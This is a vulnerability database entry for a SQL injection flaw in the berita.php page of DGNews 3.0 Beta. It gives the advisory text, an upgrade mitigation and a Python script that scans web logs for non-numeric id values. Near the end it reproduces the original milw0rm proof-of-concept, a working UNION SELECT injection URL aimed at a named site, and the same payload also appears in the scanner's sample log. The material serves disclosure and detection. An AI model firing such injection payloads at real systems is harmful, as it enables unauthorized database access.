Vendor: DGNews
By: milw0rm.com
CVSS: 9 (HIGH)
CWE: 89 (SQL Injection)
Product Name: DGNews
Affected Version From: 3.0 Beta
Affected Version To: 3.0 Beta
Patch Exists: YES
Related CVE: CVE-2009-2118
CPE: a:diangemilang:dgnews:3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Year: 2009

DGNews 3.0 Beta (berita.php) Remote SQL Injection Vulnerability

DGNews 3.0 Beta is prone to a remote SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

Mitigation:

Upgrade to the latest version of DGNews 3.0 Beta.
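
Until the upgrade is in place, web-server logs can be checked for berita.php requests whose id parameter is not a plain number. The script below is an added example, not part of the original advisory or of DGNews; the combined log format, the sample lines and the rule that legitimate ids are plain integers are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
VALID_ID_RE = re.compile(r"[0-9]{1,10}")  # assumption: ids are plain integers

def fully_decode(value, rounds=3):
    """URL-decode repeatedly so nested encoding (%2527) is unwrapped."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_id(log_line):
    """Return the decoded id of a berita.php request when it is not a
    plain integer, or None for clean and unrelated lines."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/berita.php"):
        return None
    # keep_blank_values: an empty id= is inspected rather than dropped
    for raw in parse_qs(url.query, keep_blank_values=True).get("id", []):
        value = fully_decode(raw)
        if not VALID_ID_RE.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_id) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_id(line)
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample entries (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/May/2009:10:00:01 +0000] "GET /news/berita.php?view=detail&id=28 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/May/2009:10:00:05 +0000] "GET /news/berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11-- HTTP/1.1" 200 4980 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/May/2009:10:00:09 +0000] "GET /news/berita.php?view=detail&id=28%2527 HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [18/May/2009:10:00:12 +0000] "GET /news/index.php?id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric id {value!r}")
```

A hit shows that a non-numeric id was requested, not that the query succeeded; compare the response size and status of flagged lines against a normal article view.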

Exploit-DB raw data:

********************************************************************
* DGNews 3.0 Beta (berita.php) Remote SQL Injection Vulnerability  *
********************************************************************
            
http://diangemilang.com/news/berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11--
            
mysql 5 :)
            
Download :- http://www.diangemilang.com/download/comment.php?dlid=33&ENGINEsessID=2fcff934ccb74a561cd4c5df3dacd345

# milw0rm.com [2009-05-18]